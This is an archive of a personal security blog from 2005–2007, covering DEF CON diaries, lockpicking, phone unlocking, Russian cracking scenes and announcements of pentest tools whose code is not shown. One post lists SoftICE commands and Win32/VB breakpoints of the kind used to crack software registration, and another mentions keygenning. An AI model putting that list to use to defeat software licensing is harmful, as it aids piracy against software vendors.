While I still feel that it's an important dimension to drop the packets from hostile networks, it's even more important these days to invoke defensive business logic at the application layer when application requests are originating from those same hostile networks.

For example, if I'm linked off an ebay storefront and I'm getting some lusers from middle America that have quietly owned servers in north korea trying to ddos me....that's a no brainer. On the other hand if those same users have owned systems in...say...Brazil...maybe I don't drop the packets, but build more robust business process into the requests for service coming from that part of the world.

--

How do you know the relative hotility of a given network / geographic location?. Just ask the excellent people at the honeynet project. More details to come.

IRC, corporate nets and the undergound economy

2007-01-10T21:42:00.000-05:00

So I got this new job. In fact right now I'm doing the 212 hustle. I like it. I can instant message my boss on a corporate network rather than IRC. That's a good thing.

Although I never have worked for anyone on IRC, it clearly is a venue for those without ethics and conscience to find work. It's even worse when I realize the symbiosis between corporate America and underground commerce.

I'm not really sure what to make of it. Organized crime is dependent on a functional technology and business infrastructure to conduct criminal business. It's all about money.

Critical infrastructure is to some extent necessary for a functional underground....seems highly unlikely that we will see criminals disrupt key critical infrastructure that supports criminal activity.

Peter Neuman (the RISKS) guy...talked at a USENIX con long ago that while the greater efficeincy of networking technologies have intrinsic benefits, the ability to use infrastructure against itself becomes just as powerful.

But heck...I enjoy my time in the 212 world of increasing online efficiencies...then go home to spend time with family and attempt to forget some of the greatest threats we face in the new year.

ketamine

2007-01-04T08:56:00.000-05:00

So this is my version of sql ninja. In fact, I'd stop right now and just download that....don't even mess with this program unless you like python. I've tried to stop writing perl in spite of myself. Maybe I'll do a HDM and go to ruby or something. At least it does not have the horrible indentation syntax of python.

site_slither

2007-01-03T13:37:00.000-05:00

Here is the clone of sitedigger version 1. I think the query string csv format has changed to xml. Either way I'll post the format of all the input files soon. Again this is posted as a bmp...this time because the darn cut and paste does not render things so good. I'm getting the distinct impression that blogging does not generally include posting code.

sigh

mr_rodgers

2007-01-03T10:42:00.000-05:00

I'm having trouble posting the core mr_rodgers script. It's because of the xml stuff in it. I've tried and ....no luck. i know it's weird but I've posted it as a bmp thanks to irfanview.

mr_rodgers is the beginning of a small program enumerate the citrix program neighborhood, run through all the api calls in wpnbr.dll and start the process of fuzzing the xml service.

If you don't want to retype the code I'll send it to you or try to post it somewhere.

penetration testing projects for 2006

2006-12-29T21:39:00.000-05:00

I have been working on several pen testing projects over the last few months. Almost done.

The most recent is mr_rodgers. It's a citrix program neighborhood enumerator. Nothing big, but removes the need for installation of the entire citrix suite of programs to perform some simple recon. Additionally changes in exposed services over time can be tracked through the use of this tool and potentially sensitive information can be obtained.

Next was a tool created to fill some gaps in the functionality of the excellent sql ninja program. things like session management and support for proxies.

And finally...or rather a long time ago I created a python version of site digger that does not need use the google api.

I'll post the source to all these very soon.

nokia N72

2006-12-28T09:52:00.000-05:00

So I got an N72. Very cool phone, 2nd gen s60 platform. I've been using a moto L6 for the past 6 months and an old 7290 blackberry for data. I forgot how much I like the symbian platform.

The most interesting thing I'm finding since I stopped using my 3650 and n-gage a few years ago is the total lack of cypherpunk grade crypto for the platform. Sure Pointsec and Safeboot have the backdoored crypto for corporate use, but for the "open" platform that s60 is supposed to be, the lack of good crypto is painfully obvious.

sysrec is back

2006-12-27T21:59:00.000-05:00

After slightly more than 1 year, sysrec is back. I've continued the reconfig efforts, albeit in a more personal fashion.

Technology has changed as well as some internal perspectives. In some respects I spent 2006 weighing the benefits of public disclosure with that of personal privacy. You might have guessed by this point that I'm leaning toward pubic disclosure of cracks in the matrix, where to find them and how to use them to manage the onslaught of dis-information we are confronted with each day.

The primary driving force behind this new perspective is to connect with others of like thinking and to help in the global dissemination of useful information.

In the face of those lofty goals I don't claim to be an expert in anything and will continually remind others to take any information disseminated by sysrec as false until proven true.

It's good to be back.

dot-ru revolution, part ii

2005-12-21T15:22:00.000-05:00

I've been trying to get consensus on two separate scenes over the past 6 months. The russians have the post cold war underground to retreat to while the chinese have loosened the reigns just enough to encourage a generation of cracking experts.

Who is better at cracking apps?

dot-ru revolution, part i

2005-11-28T21:51:00.000-05:00

I've mentioned about the russian connection to software reversing. If its not clear why the *.ru world is an epicenter for this activity, consider that they have an abundance of smart, unemployed or under employed tech workers, the economy sucks, and since the 40's there has been a well established underground.

This by no means is justification for the activities, but more of a rationalization for the pretty leet reversing scene in that region.

The other interesting phenomenon that the russians have perfected is peer to peer banking. Add anonymity to this and we have a frightening picture for the people that brought us ECHELON. Paypal meets Kazaa. Underground funds transfer has been happening for years, no regulation, no accountability, no paper trail. For better or worse the primary way to track international crime is to follow the money.

podcasts and h/p and the dot-ru connection

2005-11-16T21:44:00.000-05:00

There is some interesting content archived and being archived in mp3 format regarding the h/p scene. For example binrev.com has some great content for the price...free. And in particular stromcarlson has done some great work documenting modern phone network sounds. I've used to the yearly release of blackhat/defcon mp3s on the respective sites, but now we have HOPE, phreakNIC and all sorts of other cons encoding to audio.

Over the last few months I've been looking at more and more russian hacking sites. I've always been a visitor to well known sites like cr@cklab, r3team and web-hack. But more and more are showing up with good content. The problem is that a large number of these sites are blatantly associated with criminal activity. Ethics aside the sites have some relevant content to legitimate reversing and basic knowledge of the ru scene.

212 locksmiths and ebay

2005-09-04T21:37:00.000-04:00

I have to give credit to an unnamed downtown 212 locksmith. Smart guy...although they seem to take a dim view of lockpicking as a sport. So I ask they guy what a basic medeco mortise cylinder costs. About $80-100 US dollars. Nice...except I don't have that kind of money to throw down on a high security lock that I'm planning on cutting in half to understand better. No amount of illustrations or lockpicking101.com forum posts can replace the kinesthetic experience of dissecting a lock for fun.

But he goes on to say, "Sure....get a good lock, but spend your money on a strong door frame". That was good to hear from someone that does not sell doors and could have enticed me into buying the medeco.

So now I'm off to ebay...just like the nice people from dc719 told me. I love it. High security locks that cost more to ship than to buy. I'm talking schlage everest cylinders for $5 bucks a crack. ASSA cores for $10 each. I'm hooked.

I like to kill the checkpin on the everest and start with 5 pins. Matt Blaze says it's legit so I'm down with it. Makes it easier to practice on long flights without having to jam yet another thing into the keyhole to defeat the checkpin. Less than 5 minutes tells me I better put the 6th pin back in. Takes a little longer.

The 212 playground

2005-08-17T18:30:00.000-04:00

I found an interesting place to stay for a night or 2 in midtown NY. Google the hudson hotel...It's kind of tokyo meets college dorm living. I've never slept better in the city. After seeing the size of the small rooms, I had some concerns with the advice given to stay there. Everything was in perfect balance though. Wireless net access and the high level of customer service really set this place apart. It is set in a nice neighborhood with lots of good places to eat.

I think I'll try again next time.

Unlocking gsm devices

2005-08-11T22:06:00.000-04:00

Back on the topic of nokia and GSM phones in general. Most people would expect that the phone they own will work on any GSM network. That is actually not the case. All providers lock the phones to their specific network so, even though you own the phone, you can't switch services easily by purchasing a new sim card. Additionally it prevents the use of prepaid regional sims favored by international travelers.

I'll help unlock phones for free. Google around and see that most sites charge for unlocking. You can download the software for free and mess up your phone if not careful.

darknets and the legacy barcode thing

2005-08-09T22:40:00.000-04:00

I finally got around to setting up a tor node. I think its a good idea to support that sort of thing in any way possible. I also found and interesting tor java client hidden in JAP.

There I was reading the last of what was a great hacktivismo undertaking...peek-a-booty. And sure enough there was a link to a current (albeit unaffiliated) project called java anonymous proxy. After configing it for 90 or 120 seconds I noticed a tor tab and socks config. Way cool

I've had a pristine cuecat laying around in it's orginal packaging ...for 4 years. The other day I turned it into a barcode reader. That was fun...I'm just not sure what to do with it now. I've started scanning any barcodes I can find. I feel like I should be really getting more efficient at something now that I have a free barcode scanner. I'm throwing it back in the closet for another few years.

Pushing to the stack

2005-08-04T16:38:00.000-04:00

This is also a spot for reference things I occasionally forget that others might find useful.

:proc
:addr proc_name/#
:s 0:0 l -1 "string"
:map32 proc_name
:heap 32 proc_name
:d eax/edx

win32 bpmg's
--------------
WM_GETTEXT

win32 bpx's
-----------------
GetWindowTextA
GetDlgItemTextA
RegCreateKeyA
RegQueryValueA
MessageBoxA
MessageBoxExA
GetSystemTime
GetLocalTime
SystemTimeToFileTime
CreatewindowexA
GetLogicalDrivesA
GetLogicalDriveStringsA
SENDMESSAGE
WSPRINTF

vb bpx's
------------
__vbaStrCat
__vbaStrCmp
__vbaStrComp
__vbaStrCompVar
__vbaStrCy
__vbaStrDate
__vbaStrFixstr
__vbaStrI2
__vbaStrI4
__vbaStrLike
__vbaStrR4
__vbaStrR8
__vbaStrTextCmp
__vbaStrTextLike
__vbaStrToAnsi
__vbaStrToUnicode

Amazon, kris kaspersky and neuro-circuitry

2005-08-03T20:57:00.000-04:00

After 3 months of waiting my Amazon order was delivered. I was really getting bored of email notices telling me to confirm yet another delay. But as most everything goes, if you stick with it, it's worth the wait.

So I was waiting for Kris Kaspersky's latest book, debugging uncovered. ISBN 1-931769-40-0. Very good book. I've only had it for 4 hours and I'm well into it. One interesting part discussed is the use of emulators in software hacking. Seems intuitive but I've never seen it in print. Of course VMware is the choice among several. Mainly because it's the only one that softice (>3.1) likes. I origially found it on google, but here is the reference config for VMware from the book: svga.maxFullscreenRefreshTick = "2" and vmouse.present = "FALSE". It's noted that this can also be found in the softice docs.

The other interesting thing noted is that Kris points out that win2k is much better than winxp for his sort of endeavors. I'll get back to that at some point. I know win2k pro had some specific hack-friendly components...I was not aware of those being left out of xp though.

In addition to the pre-published book ordered months ago I tacked on a companion dvd called "better living though circuitry". I got a similar one as a holiday gift a few years back and it seemed a logical choice to go with the book.

nokia is the best

2005-08-03T10:28:00.000-04:00

I found an old nokia 252 cell phone the other day. Nokia is by far the best. I'd never use anything else. It's always refreshing to find old cell phons like that. Werid thing is that all the call logs and phone books were intact. Like after, what 5-7 years of no battery. I love nokia.

So instinctivley I type in * # 6391# and start testing. Three hours later...it's fully tested and I'm on to finding the small skrewdriver to get to the hardware.

sunday evening dc13

2005-07-31T19:07:00.000-04:00

So defcon is over. Another year to contemplate the happenings of the past weekend. Anything is possible. There are no secrets. Judgement of an individual's technical ability should be done on what she is doing rather than what she has done. And overall judgement of a indivudual should be measured by how much they give rather than how much they take.

so hacking is more than just understanding the matrix, reverse engineering, writing shellcode, owning boxes, and installing rootkits on them. It really about building things, taking them apart, learning, teaching and giving in ways never thought possible.

That's hacking.

sunday morning dc13

2005-07-31T11:06:00.000-04:00

It was a long night last night. Not sure if it was the industial at pool two or the techno at pool three. But I had a hard time getting to sleep. I ended up watching hacker jepordy. That was funny. Cool questions jsut like normal jepordy but with the added scoring of 1000 points for each beer consumed by a member of a 3 person team.

After about 3/4 of the way through of course one of the team members comtributed a little too much to the 1000 point bonus scoring and...well...he ended up with a slihtly cramped but very clean upper GI tract. That was not the funny part.

It was not until a clown form an opposing team tried to answer a question by emailing a friend for an answer using his blackberry. That was clearly against the common law rules so a person from the thrid oposing team grabbed it and threw it in the puke.

So I checked out of hotel and headed to the airport. I had a few hours to read a new book a got about windows kernel internals called "rootkits". It's a good book. There were several good presentations at blackhat and defcon about rootkits.

evening time at defcon 0x0D

2005-07-31T00:04:00.000-04:00

Evening draws near at the con. Time for the black and white ball and...new for this year... queercon. I really don't fit into the goth scene or the gay scene. But it would be fun to go at least once I suppose.

But I'm here to teach and learn. So there was yet another good physical security talk on high security locks and safe bypass techniques. Very interesing stuff. And then finally for me the 2 hour talk about becomming you own phone company with the help of a tricked out asterisk box.

I have one set up at home...actually running asterisk @ home, with all the web interface stuff. I love it. The talk was great and has inspired me to donate all my extra winnings since I got here to the asterisk development team...or maybe I'll just buy more cisco 79xx phones for home projects...If you have not set up asterisk box yet...do it, you rmind is the limit when you have you rown pbx. Way too much fun.

I'll be checking out the latest updates in the CTF area then work on my current kegenning project. Then sleep.

saturday afternoon defcon 13

2005-07-30T17:02:00.000-04:00

Mark Tobias and his security.org crew had an interesting discussion about full disclosure for physical security devices e.g. locks and safes. So a number of vulnerabilities were discussed. All were well known. The main question was asked, "Does it increase security of locks to disclose defects"? Of course the answer was yes. but it was actulaly pointed out the both kryptonite and best locks are now made without previou defects found.

Following that was another talk on lockpicking. Perhaps the most important demonstration was the one showing a defect in common gun locks. These can be breached in about 5 seconds by anyone with a wire. Kind of chilling.

Got some pizza and water for lunch.

saturday at defcon 13

2005-07-30T11:26:00.000-04:00

The halmark of an early morning at the Alexis Park on defcon staturday is the marked decrease in overal BPM. It peaks at about 3am then slowly drops off as dawn approaches.

For me...at dawn...the pillows come off my head just enough to turn off my wrist watch alarm. First thing in the morning...drink water...two glasses. The heat is searing at over 100F each day. I like it that way though.

I take a short walk to my favorite breakfast food serving place in this area. Mr.Lucky's at the Hard Rock Cafe. they have great food in my price range. A new flair has been added to the lunchtime spread...Fake new york pizza next to a newly built cvs 1/8 mile east for the hotel.

So last night there was a good session on russian hacker sites. How the russian economy is broken and encourages identity theft, software pirating and so on. And then the discussion turned to how we can find and make sense of russian criminal element to better test and protect systems in the west.

friday afternoon [at] defcon 13

2005-07-29T23:47:00.000-04:00

Wow...great talks so far today. And what better way to stay up on the latest schedule (and last minute changes) than by registering with defcon by phone. I called up and asterisk box, it called me back, I set a super secret pin and wammo...I'm in.

It's always easier for me to use the same 4 digit pin for all my access codes and registering my home fone was important to make sure I do not miss any updates.

Anyway Mudge (along with two wiskey sour's..I think) gave an attempt at defining some laws of internal networks, that if broken could be an early indication of a compromise. This whole idea exploits the fact that internet networks and associated layer 2 and layer 3 activity have fundimental differences that the respective activity on an intranet. It is worth noting that very few IDS's deployed on internal networks actualy look for this anomylous activity

For example we should not expect a file server to generate layer 3 traffic associated with web surfing. Or we would not expect to find a desktop accepting connections from clients. We would expect that layer 2 activity would have a constant MTU size on an internal network, that packets would arrive in order, and so forth.

Richard Theime was talking about hacker culture as he does...it was good content, until he digressed into interplantary travel and the assoicated space ships traveling beyond the speed of light.

Bruce and later the rest of the shmoo group had some good insights and one bad one. First the bad one. Well maybe not bad, just misguided from my point of veiw. I'll start by saying I think openbsd is the best operating system...ok, now that that's out of the way...Bruce tried to make the case that bsd is better than linux.

In fairness, the talk was framed as a 'discussion'. He even made windows look better than linux. The 0xbeef of the argument was that userland utilites are integrated in formal *bsd releases in contrast to linux where the kernel and userland development are disjoint and are 'glued' together differently by each distro.

My response to that argument, while true, is that userland and kernel developers are different in the bsd world as well and use just as much glue and the linux distro guys.

It was also pointed out that patches and advisories to windows are much more rapid and formalized than in the linux world. bsd patches were not part of the discussion...wonder why? Hmm..well bsd patches come out very quickly, in source code... that's for sure...what could it be. Here is the secret to maximum bsd uptime...don't patch. for those that don't know what I'm talking about...likley you have never run bsd boxes in production.

So lets see...I'm going to patch my prod systems today...guess I have to recompile the entire os...that does not happen too often outside a lab environment or desktop .

Enough of the bad news. Bruce then came back with Bettle and demonstrated rouge squadren, a new wrt54g firmware they wrote to show how easy it is to set up a rouge access point. Very nice work.

I entered the lockpicking contest. Boy was that fun...10 minutes to pick a weiser lock...seemed easy enough. I did not have enough practice going into it. I normally can pick a wieser core in less than 2 minutes...geeez. I think I heard these locks had 8 pin settings. Maybe different than mine. I got a shirt out of it anyway. There is always next year.

Some friends and I [literally] chilled out in my room and watched defcon tv...then went to dinner.

friday morning @ dc13

2005-07-29T11:23:00.000-04:00

I've made it to the wonderful world defcon once again this year.

Something seems a little different though. Take yesterday morning for example. I was out getting breakfast at an abnormally early time (I'm still on EDT)...and could not help notice a small group that was extending their previous night's party.

I was just going to walk by when I was stopped and asked if I wanted a beer. I said sure...it was a nice gesture...the thought is what counts.

So the vibe is pretty good so far. I've been practicing for the lockpicking contest today and towmorrow. I have not got a chance in hell of winning...it's fun getting up in front of everyone and the spirit of the competition.

Oh yea...I woke up this morning and the phone was out of service. Hmmm...wonder what happened. Anyway...it's back up...likley being monitored by the dc13 faithful and I get to post this.